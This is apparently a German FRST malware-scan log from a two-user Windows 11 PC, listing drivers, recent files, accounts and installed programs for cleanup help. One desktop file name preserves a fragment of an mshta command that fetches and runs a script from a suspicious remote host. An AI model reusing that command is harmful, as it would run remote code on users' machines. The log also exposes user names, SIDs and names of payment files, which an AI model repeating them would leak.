S3 ViGEmBusUpdater; C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBusUpdater.exe [901144 2019-05-10] (Nefarius Software Solutions e.U. -> Nefarius Software Solutions e.U.) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe [3199672 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe [141952 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) R2 ZoomCptService; "C:\Program Files\Common Files\Zoom\Support\CptService.exe" -user_path "C:\Users\Marcel\AppData\Roaming\Zoom" ===================== Treiber (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R3 amdfendrmgr; C:\WINDOWS\System32\drivers\amdfendrmgr.sys [35344 2022-09-09] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) R3 amdwddmg; C:\WINDOWS\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\amdkmdag.sys [99747448 2023-09-20] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) R3 AMDXE; C:\WINDOWS\System32\drivers\amdxe.sys [59920 2022-05-31] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [78328 2021-08-25] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com) S3 ctxapdriver; C:\WINDOWS\system32\DRIVERS\ctxapdriver.sys [81584 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S3 ctxapinject; C:\WINDOWS\system32\DRIVERS\ctxapinject.sys [128680 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S4 ctxapusbfilter; C:\WINDOWS\system32\DRIVERS\ctxapusbfilter.sys [61600 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.) 
S4 CtxDs2; C:\WINDOWS\System32\drivers\CtxDs2.sys [186800 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S4 CtxDt2; C:\WINDOWS\System32\drivers\CtxDt2.sys [229400 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S4 CtxIsolate; C:\WINDOWS\System32\drivers\CtxIsolate.sys [341536 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S4 CtxSupport; C:\WINDOWS\System32\drivers\CtxSupport.sys [108576 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) R2 ctxusbm; C:\WINDOWS\system32\DRIVERS\ctxusbmon.sys [164000 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.) R0 fse; C:\WINDOWS\System32\drivers\fse.sys [218592 2024-11-13] (Microsoft Windows -> Microsoft Corporation) R2 googledrivefs31626; C:\Program Files\Google\Drive File Stream\Drivers\31626\googledrivefs31626.sys [384096 2024-07-25] (Microsoft Windows Hardware Compatibility Publisher -> Google, Inc.) S3 HidGuardian; C:\WINDOWS\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer) R3 IBMPMDRV; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmdrv.sys [56128 2023-06-20] (Lenovo -> Lenovo) S3 libusbK; C:\WINDOWS\System32\drivers\libusbK.sys [47200 2022-06-16] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net) R3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [44880 2024-09-27] (Logitech Inc -> Logitech) S3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [32080 2022-10-06] (Logitech Inc -> Logitech) R3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [73040 2024-09-27] (Logitech Inc -> Logitech) R3 logi_lamparray; C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray.sys [89192 2024-10-30] (Logitech Inc -> Logitech, Inc.) 
R1 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [69984 2024-01-18] (WDKTestCert Nmap,133147429230506937 -> Insecure.Com LLC.)
S3 ovpn-dco; C:\WINDOWS\System32\drivers\ovpn-dco.sys [92664 2024-06-05] (WDKTestCert lev,133391533294737317 -> OpenVPN, Inc)
R1 PMDRVS; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\pmdrvs.sys [41792 2023-06-20] (Lenovo -> Lenovo)
S3 RtkUsbAD_03F00269; C:\WINDOWS\system32\drivers\RtUsbA64_03F00269.sys [428840 2020-06-16] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.)
S3 rtucx22x64; C:\WINDOWS\System32\DriverStore\FileRepository\rtucx22x64.inf_amd64_a6eb3abe5befec7d\rtucx22x64.sys [1876424 2024-04-24] (Realtek Semiconductor Corp. -> Realtek Corporation)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 ssdevfactory; C:\WINDOWS\System32\drivers\ssdevfactory.sys [42912 2022-07-06] (Microsoft Windows Hardware Compatibility Publisher -> SteelSeries ApS)
R3 SteamStreamingMicrophone; C:\WINDOWS\system32\drivers\SteamStreamingMicrophone.sys [40736 2020-06-01] (Valve Corp. -> )
R3 SteamStreamingSpeakers; C:\WINDOWS\system32\drivers\SteamStreamingSpeakers.sys [40736 2020-06-01] (Valve Corp. -> )
R1 steamxbox; C:\WINDOWS\System32\drivers\steamxbox.sys [278208 2023-02-21] (Valve Corp. -> Valve Corporation)
R3 SteelSeries_Sonar_VAD; C:\WINDOWS\System32\DriverStore\FileRepository\steelseries-sonar-vad.inf_amd64_889fe0b3603163e3\SteelSeries-Sonar-VAD.sys [92312 2022-11-08] (SteelSeries ApS -> Windows (R) Win 7 DDK provider)
R3 tap-tb-0901; C:\WINDOWS\System32\drivers\tap-tb-0901.sys [38656 2023-07-10] (TunnelBear, Inc. -> The OpenVPN Project)
S3 VBoxNetAdp; C:\WINDOWS\System32\drivers\VBoxNetAdp6.sys [253224 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [264096 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 VBoxSup; C:\WINDOWS\system32\DRIVERS\VBoxSup.sys [1062048 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R3 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [69168 2019-04-04] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 vmbusproxy; C:\WINDOWS\system32\drivers\vmbusproxy.sys [94208 2024-04-05] (Microsoft Windows -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [22104 2024-10-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [606624 2024-10-30] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [105888 2024-10-30] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\WINDOWS\system32\DRIVERS\wintun.sys [29680 2024-07-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
S3 WireGuard; C:\WINDOWS\System32\drivers\wireguard.sys [489368 2024-07-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
U4 npcap_wifi; kein ImagePath
S3 polarbear-split-tunneling; \??\C:\Program Files (x86)\TunnelBear\Drivers\x64\SplitTunnelingDriver.sys [X]
S3 tapnordvpn; \SystemRoot\System32\drivers\tapnordvpn.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2025-01-06 12:19 - 2025-01-06 12:19 - 000000143 _____ C:\Users\Lisa\Desktop\mshta httpssolve.vwglq.comawjxs.cap.txt
2025-01-06 12:07 - 2025-01-06 12:07 - 000051092 _____ C:\Users\Lisa\Downloads\Shortcut.txt
2025-01-06 12:05 - 2025-01-06 12:07 - 000066202 _____ C:\Users\Lisa\Downloads\Addition.txt
2025-01-06 12:03 - 2025-01-06 12:19 - 000033105 _____ C:\Users\Lisa\Downloads\FRST.txt
2025-01-06 12:03 - 2025-01-06 12:19 - 000000000 ____D C:\FRST
2025-01-06 12:02 - 2025-01-06 12:02 - 002403840 _____ (Farbar) C:\Users\Lisa\Downloads\FRST64_0125.exe
2025-01-06 12:02 - 2025-01-06 12:02 - 002403840 _____ (Farbar) C:\Users\Lisa\Downloads\FRST64_0125 (1).exe
2025-01-06 11:39 - 2025-01-06 11:39 - 000722202 _____ C:\WINDOWS\system32\perfh007.dat
2025-01-06 11:39 - 2025-01-06 11:39 - 000149258 _____ C:\WINDOWS\system32\perfc007.dat
2025-01-06 11:37 - 2025-01-06 11:37 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Wireshark
2025-01-06 11:16 - 2025-01-06 11:16 - 000003460 _____ C:\WINDOWS\system32\Tasks\npcapwatchdog
2025-01-06 11:16 - 2025-01-06 11:16 - 000000000 ____D C:\WINDOWS\SysWOW64\Npcap
2025-01-06 11:16 - 2025-01-06 11:16 - 000000000 ____D C:\WINDOWS\system32\Npcap
2025-01-06 11:13 - 2025-01-06 11:34 - 000000000 ____D C:\Program Files\Wireshark
2025-01-06 11:12 - 2025-01-06 11:12 - 087277648 _____ (Wireshark development team) C:\Users\Lisa\Downloads\Wireshark-4.4.2-x64.exe
2025-01-06 10:57 - 2025-01-06 10:57 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\PolarBear
2025-01-06 08:43 - 2025-01-06 08:43 - 000000143 _____ C:\Users\Lisa\Desktop\new 2.txt
2024-12-30 22:18 - 2024-12-30 22:19 - 685563904 _____ C:\Users\Marcel\Downloads\krd.iso
2024-12-30 20:34 - 2024-12-30 20:34 - 000000000 ____D C:\Users\Lisa\AppData\Local\INetHistory
2024-12-27 09:05 - 2024-12-30 20:42 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Notepad++
2024-12-27 08:57 - 2024-12-27 08:57 - 000069562 _____ C:\Users\Lisa\Desktop\Kilgenstein_Zahlung Beleg_27.12.24.pdf
2024-12-19 20:43 - 2024-12-19 20:43 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2024-12-19 13:44 - 2024-12-19 13:44 - 000070580 _____ C:\Users\Lisa\Desktop\Rüppel_Zahlung 19.12.24_Beleg.pdf
2024-12-19 13:29 - 2024-12-19 13:29 - 000232557 _____ C:\Users\Lisa\Desktop\Kilgenstein_Zahlung Beleg_19.12.24.pdf
2024-12-17 17:45 - 2024-12-17 17:45 - 000013951 _____ C:\Users\Marcel\Documents\Kopie von 241201_PayPal_Zahlungen_Fotografin_2024.xlsx
2024-12-11 12:23 - 2024-12-11 12:23 - 001254975 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 10.08.46_2.jpeg
2024-12-11 12:23 - 2024-12-11 12:23 - 000002285 _____ C:\Users\Marcel\AppData\Local\recently-used.xbel
2024-12-11 12:03 - 2024-12-11 12:03 - 000115134 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 09.33.38.jpeg
2024-12-11 10:32 - 2024-12-11 10:32 - 338740136 _____ (The GIMP Team ) C:\Users\Marcel\Downloads\gimp-2.10.38-setup-1.exe
2024-12-11 10:31 - 2024-12-11 11:47 - 000166704 _____ C:\Users\Marcel\Downloads\WhatsApp Image 2024-12-11 at 10.08.46.jpeg
2024-12-11 10:21 - 2024-12-11 10:22 - 000010534 _____ C:\Users\Marcel\Downloads\Bestellung Digitale Fotos.xlsx
2024-12-11 10:21 - 2024-12-11 10:21 - 000000000 ____D C:\Users\Marcel\AppData\Local\CtxUnleashClient
2024-12-11 10:20 - 2024-12-11 10:20 - 000002584 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix Workspace.lnk
2024-12-11 10:20 - 2024-12-11 10:20 - 000000000 ____D C:\ProgramData\Citrix

==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2025-01-06 12:06 - 2022-05-07 06:22 - 000000000 ____D C:\WINDOWS\INF
2025-01-06 11:55 - 2022-05-07 06:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2025-01-06 11:45 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SystemTemp
2025-01-06 11:43 - 2022-08-11 06:07 - 000000000 ____D C:\Program Files (x86)\AnyDesk
2025-01-06 11:42 - 2022-05-19 17:04 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2025-01-06 11:39 - 2024-04-05 10:06 - 001662892 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2025-01-06 11:38 - 2022-12-02 17:21 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2025-01-06 11:35 - 2024-04-05 10:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2025-01-06 11:35 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ServiceState
2025-01-06 11:35 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\AppReadiness
2025-01-06 11:35 - 2022-02-28 16:48 - 000000000 ____D C:\Program Files\TeamViewer
2025-01-06 11:35 - 2022-02-28 14:40 - 000012288 ___SH C:\DumpStack.log.tmp
2025-01-06 11:34 - 2022-05-07 06:17 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2025-01-06 11:16 - 2022-03-29 15:28 - 000000000 ____D C:\Program Files\Npcap
2025-01-06 11:13 - 2022-03-03 11:35 - 000000000 ____D C:\ProgramData\Package Cache
2025-01-06 09:09 - 2022-02-28 21:18 - 000000000 ____D C:\Users\Lisa\AppData\Roaming\Microsoft\MMC
2025-01-06 08:41 - 2024-04-05 09:59 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2024-12-30 23:27 - 2024-04-05 09:59 - 000001607 _____ C:\WINDOWS\system32\config\VSMIDK
2024-12-30 23:27 - 2023-10-20 11:26 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Teams
2024-12-30 22:35 - 2022-05-07 06:24 - 000000000 ___HD C:\Program Files\WindowsApps
2024-12-30 22:28 - 2024-04-05 09:17 - 000000000 ____D C:\Users\Marcel
2024-12-30 22:09 - 2024-07-21 23:42 - 000000000 ____D C:\Users\Marcel\Documents\Bluetooth
2024-12-30 20:37 - 2023-07-05 07:26 - 000000000 ____D C:\Users\Lisa\AppData\Local\CrashDumps
2024-12-30 18:18 - 2022-02-28 18:30 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Word
2024-12-27 10:26 - 2022-03-30 08:07 - 000000000 ____D C:\ProgramData\Barrier
2024-12-27 08:57 - 2022-02-28 15:48 - 000000000 ____D C:\Users\Marcel\AppData\Local\D3DSCache
2024-12-27 08:48 - 2022-02-28 15:59 - 000000000 ____D C:\Users\Lisa\AppData\Local\D3DSCache
2024-12-27 08:15 - 2022-02-28 14:40 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2024-12-27 08:10 - 2022-02-28 15:54 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2024-12-27 08:09 - 2024-04-05 10:06 - 000003756 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2024-12-27 08:09 - 2024-04-05 10:06 - 000003632 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2024-12-19 20:58 - 2022-05-07 06:24 - 000000000 ____D C:\ProgramData\USOPrivate
2024-12-19 20:43 - 2022-05-07 06:24 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2024-12-19 20:42 - 2024-04-05 09:59 - 000675104 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2024-12-19 20:42 - 2022-02-28 17:15 - 000000000 ____D C:\Program Files\Microsoft Office
2024-12-19 20:41 - 2023-10-01 08:01 - 000000000 ____D C:\WINDOWS\system32\Microsoft-Edge-WebView
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___SD C:\WINDOWS\system32\UNP
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___SD C:\WINDOWS\system32\lxss
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___RD C:\WINDOWS\PrintDialog
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\SystemResources
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\Sgrm
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\setup
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\oobe
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\HealthAttestationClient
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\Dism
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\system32\appraiser
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ShellExperiences
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\ShellComponents
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2024-12-19 20:41 - 2022-05-07 06:24 - 000000000 ____D C:\WINDOWS\bcastdvr
2024-12-19 20:39 - 2024-04-05 09:17 - 000000000 ____D C:\Users\Lisa
2024-12-17 17:45 - 2022-03-01 10:38 - 000000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Excel
2024-12-17 17:45 - 2022-03-01 09:38 - 000000000 ____D C:\Users\Marcel\AppData\Local\babl-0.1
2024-12-17 14:28 - 2022-02-28 15:48 - 000000000 ____D C:\Users\Marcel\AppData\Local\Packages
2024-12-17 13:38 - 2022-08-04 09:32 - 000000000 ____D C:\Users\Marcel\Documents\Arduino
2024-12-17 13:26 - 2024-04-25 19:38 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1775496863-3233068474-2158662417-1002
2024-12-17 13:26 - 2024-04-25 19:38 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1775496863-3233068474-2158662417-1002
2024-12-17 13:26 - 2022-02-28 16:00 - 000002396 _____ C:\Users\Lisa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2024-12-17 13:26 - 2022-02-28 15:59 - 000000000 ____D C:\Users\Lisa\AppData\Local\Packages
2024-12-17 13:21 - 2022-07-28 20:59 - 000002173 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive.lnk
2024-12-15 20:29 - 2022-02-28 17:05 - 000000000 ___RD C:\Users\Marcel\Qsync
2024-12-15 20:28 - 2022-02-28 20:58 - 000000000 ___RD C:\Users\Lisa\Qsync
2024-12-13 12:49 - 2022-12-04 12:47 - 000000000 ____D C:\WINDOWS\system32\SteelSeries
2024-12-13 12:41 - 2024-04-05 10:06 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2024-12-13 12:41 - 2022-10-17 16:40 - 000002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat.lnk
2024-12-11 12:23 - 2022-03-16 11:25 - 000000000 ____D C:\Users\Marcel\AppData\Local\gtk-2.0
2024-12-11 10:20 - 2023-09-12 11:59 - 000000000 ____D C:\Program Files (x86)\Citrix
2024-12-11 10:17 - 2023-10-20 12:51 - 000000000 ____D C:\Program Files (x86)\dotnet
2024-12-11 10:14 - 2022-10-26 08:54 - 000037417 _____ C:\WINDOWS\system32\SEAPODATUR.USB.VID_03F0&PID_0269&MI_00.zip
2024-12-10 21:11 - 2022-05-07 06:17 - 000000000 ____D C:\WINDOWS\CbsTemp
2024-12-10 21:08 - 2024-04-05 10:00 - 003212800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2024-12-10 10:08 - 2022-08-04 09:32 - 000000000 ____D C:\Users\Marcel\AppData\Local\Arduino15

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2022-02-28 16:53 - 2022-12-02 18:07 - 000000998 _____ () C:\ProgramData\ChrEdgeFkOff.vbs
2022-07-23 10:41 - 2022-07-23 10:41 - 000000000 _____ () C:\Users\Lisa\AppData\Local\oobelibMkey.log

==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-01-2025
durchgeführt von Lisa (06-01-2025 12:20:02)
Gestartet von C:\Users\Lisa\Downloads
Microsoft Windows 11 Pro Version 23H2 22631.4602 (X64) (2024-04-05 09:06:15)
Start-Modus: Normal
==========================================================

==================== Konten: =============================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

Administrator (S-1-5-21-1775496863-3233068474-2158662417-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1775496863-3233068474-2158662417-503 - Limited - Disabled)
Gast (S-1-5-21-1775496863-3233068474-2158662417-501 - Limited - Disabled)
Lisa (S-1-5-21-1775496863-3233068474-2158662417-1002 - Administrator - Enabled) => C:\Users\Lisa
Marcel (S-1-5-21-1775496863-3233068474-2158662417-1001 - Administrator - Enabled) => C:\Users\Marcel
WDAGUtilityAccount (S-1-5-21-1775496863-3233068474-2158662417-504 - Limited - Disabled)

==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 21.07 (x64) (HKLM\...\7-Zip) (Version: 21.07 - Igor Pavlov)
Adobe Acrobat (64-bit) (HKLM\...\{AC76BA86-1031-1033-7760-BC15014EA700}) (Version: 24.005.20320 - Adobe)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 8.5.1.48 - Adobe Inc.)
Adobe Refresh Manager (HKLM-x32\...\{AC76BA86-0804-1033-1959-018244601102}) (Version: 1.8.0 - Adobe Systems Incorporated) Hidden
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 7.0.15 - AnyDesk Software GmbH)
AppDataProtection (HKLM-x32\...\{C375DC29-9995-4941-91E2-18A203E4BE85}) (Version: 24.8.0.9 - Citrix Systems, Inc.) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.19 - Arduino LLC)
Barrier 2.4.0-release (HKLM\...\{41036EA6-3F7A-4803-8AE0-469E5E91EFCC}_is1) (Version: 2.4.0-release - Debauchee Open Source Group)
BCR Plug-in (HKLM-x32\...\{FCAF693B-BEB8-48BD-9444-ED306F51AF41}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Authentication Manager (HKLM-x32\...\{72390194-1E29-4490-A2A5-0F0060EB54EC}) (Version: 24.9.0.25 - Citrix Systems, Inc.) Hidden
Citrix Web Helper (HKLM-x32\...\{0E8A240D-B3AE-414E-B792-ACAE55F5E6FE}) (Version: 24.9.1.86 - Citrix Systems, Inc.) Hidden
Citrix Workspace (DV) (HKLM-x32\...\{1E3281BC-B91F-41AA-A453-71EB05F88638}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Workspace (USB) (HKLM-x32\...\{7C4F4420-4846-42C5-9D4D-595F486C037D}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Citrix Workspace 2409 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 24.9.1.207 - Citrix Systems, Inc.)
Citrix Workspace Inside (HKLM-x32\...\{6CC4B606-D167-496C-A0EF-7BF2AF343715}) (Version: 24.9.1.85 - Citrix Systems, Inc.) Hidden
CurseForge 1.265.0-21056 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\ca0e291c-abd4-5fc3-b6a0-3d4333eccbd7) (Version: 1.265.0-21056 - Overwolf)
Discord (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Discord) (Version: 1.0.9018 - Discord Inc.)
Docker Desktop (HKLM\...\Docker Desktop) (Version: 4.18.0 - Docker Inc.)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.208.0.5465 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{99e78c1c-d34b-42af-bb92-112bf15e2dcf}) (Version: 12.208.0.5465 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.)
GIMP 2.10.30 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\GIMP-2_is1) (Version: 2.10.30 - The GIMP Team)
Git (HKLM\...\Git_is1) (Version: 2.35.1.2 - The Git Development Community)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 131.0.6778.205 - Google LLC)
Google Drive (HKLM\...\{6BBAE539-2232-434A-A4E5-9A33560C6283}) (Version: 101.0.3.0 - Google LLC)
InputMapper 1.7 (HKLM-x32\...\{E254D258-ACA2-48DD-86A8-711ADA4F5458}) (Version: 1.7.7452.13622 - DSDCS) Hidden
InputMapper 1.7 (HKLM-x32\...\InputMapper 1.7 1.7.7452.13622) (Version: 1.7.7452.13622 - DSDCS)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LibreOffice 7.3.1.3 (HKLM\...\{2AB46F12-061D-4BB1-BE17-FD65830DE46B}) (Version: 7.3.1.3 - The Document Foundation)
Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version: 2024.8.641856 - Logitech)
Microsoft .NET Host - 6.0.20 (x86) (HKLM-x32\...\{82F89EDB-1DF1-402B-BED6-01C736967B6F}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Host - 8.0.4 (x86) (HKLM-x32\...\{417B3118-9B7D-44B2-9AE8-B309A107636B}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 6.0.20 (x86) (HKLM-x32\...\{561137EF-2ECE-48F0-A6D6-6260AC7112A5}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 8.0.4 (x86) (HKLM-x32\...\{3F083079-02CA-463E-B3D1-0E23567A0A11}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 6.0.20 (x86) (HKLM-x32\...\{6E4984A9-4321-4D96-861F-D03578E68C8B}) (Version: 48.83.63169 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 8.0.4 (x86) (HKLM-x32\...\{E3319B20-3820-455B-953D-8D9D2FF2B17D}) (Version: 64.16.12025 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 131.0.2903.112 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 131.0.2903.112 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Volume - de-de) (Version: 16.0.10416.20027 - Microsoft Corporation)
